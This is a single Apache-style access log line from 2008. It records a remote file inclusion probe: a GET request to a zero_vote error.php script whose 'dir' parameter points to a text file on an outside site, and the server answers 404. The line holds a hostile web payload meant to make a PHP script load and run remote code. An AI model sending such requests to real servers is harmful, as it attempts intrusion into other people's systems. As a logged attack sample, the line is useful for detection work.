212.227.101.9 - - [18/Jan/2008:08:50:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
